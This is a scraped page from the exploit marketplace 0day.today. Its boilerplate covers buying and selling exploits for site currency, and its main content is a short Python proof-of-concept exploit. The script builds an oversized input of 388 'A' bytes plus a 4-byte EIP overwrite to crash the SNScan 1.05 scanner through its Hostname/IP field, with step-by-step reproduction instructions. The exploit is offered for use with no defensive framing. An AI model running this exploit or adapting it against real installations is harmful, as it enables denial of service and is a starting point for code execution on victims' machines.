0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash (PoC)
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title : SNScan v1.05 Scan Hostname/IP Field Buffer Overflow Crash PoC # Discovery by : Daniel Velazquez # Email : ingenierovelazquez@hotmail.com # Discovery Date : 12/01/2016 # Vendor Homepage : http://www.foundstone.com # Software Link : http://www.mcafee.com/us/downloads/free-tools/snscan.aspx # Tested Version : 1.05 # Vulnerability Type : Denial of Service (DoS) Local # Tested on OS : Windows 8 x86 es # Steps to Produce the Crash: # 1.- Run python code : python SNScan-v1.05.py # 2.- Open SNScan-v1.05.txt and copy content to clipboard # 3.- Open SNScan.exe # 4.- Clic button Ok # 5.- Paste Clipboard Scan > Hostname/IP # 6.- Clic on add button (->) # 7.- Clic button Aceptar # 8.- Crashed buffer = "\x41" * 388 eip = "\x42" * 4 f = open ("SNScan-v1.05.txt", "w") f.write(buffer + eip) f.close() # 0day.today [2025-01-08] #